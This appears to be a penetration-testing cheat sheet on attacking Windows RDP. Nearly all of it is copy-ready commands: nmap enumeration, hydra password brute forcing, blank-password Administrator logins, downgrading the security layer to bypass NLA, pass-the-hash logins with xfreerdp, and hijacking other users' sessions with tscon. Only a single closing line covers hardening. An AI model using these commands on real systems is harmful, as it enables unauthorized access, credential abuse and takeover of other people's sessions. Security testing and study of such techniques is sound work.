RDP

Overview

RDP on 3389 is the graphical way onto a Windows host. Even before logging in it leaks domain and build info, and with a password or hash it is a direct interactive session.

Enumeration

Leak domain info pre-auth:

nmap -p3389 --script rdp-ntlm-info <TARGET>

Check encryption / NLA status:

nmap -p3389 --script rdp-enum-encryption <TARGET>

Validate credentials:

nxc rdp <TARGET> -u user -p pass

Brute force:

hydra -t 4 -L users.txt -P passes.txt rdp://<TARGET>

Connecting

Basic connect (self-signed cert is common — /cert:ignore is almost always needed):

xfreerdp /v:<TARGET> /u:user /p:pass /cert:ignore +clipboard /dynamic-resolution

No password (blank/empty):

xfreerdp /v:<TARGET> /u:Administrator /p:'' /cert:ignore

Domain user:

xfreerdp /v:<TARGET> /d:<DOMAIN> /u:user /p:pass /cert:ignore +clipboard /dynamic-resolution

Non-standard port:

xfreerdp /v:<TARGET>:<PORT> /u:user /p:pass /cert:ignore

Force old RDP security layer (bypasses NLA on unpatched hosts):

xfreerdp /v:<TARGET> /u:user /p:pass /sec:rdp /cert:ignore

Share a local folder into the session (useful for file transfers):

xfreerdp /v:<TARGET> /u:user /p:pass /cert:ignore /drive:share,/tmp

rdesktop alternative:

rdesktop -u user -p pass <TARGET>

Pass-the-hash

Restricted admin mode must be enabled on the target (common on modern Windows):

xfreerdp /v:<TARGET> /u:Administrator /pth:<NThash> /cert:ignore /restricted-admin

Domain PTH:

xfreerdp /v:<TARGET> /d:<DOMAIN> /u:Administrator /pth:<NThash> /cert:ignore /restricted-admin

Session hijack (as SYSTEM)

List active sessions:

query session

Hijack another session without a password:

tscon <SESSION_ID> /dest:<YOUR_SESSION_NAME>

Hardening

Require NLA, restrict RDP to admins, enable account lockout, and patch BlueKeep-class CVEs.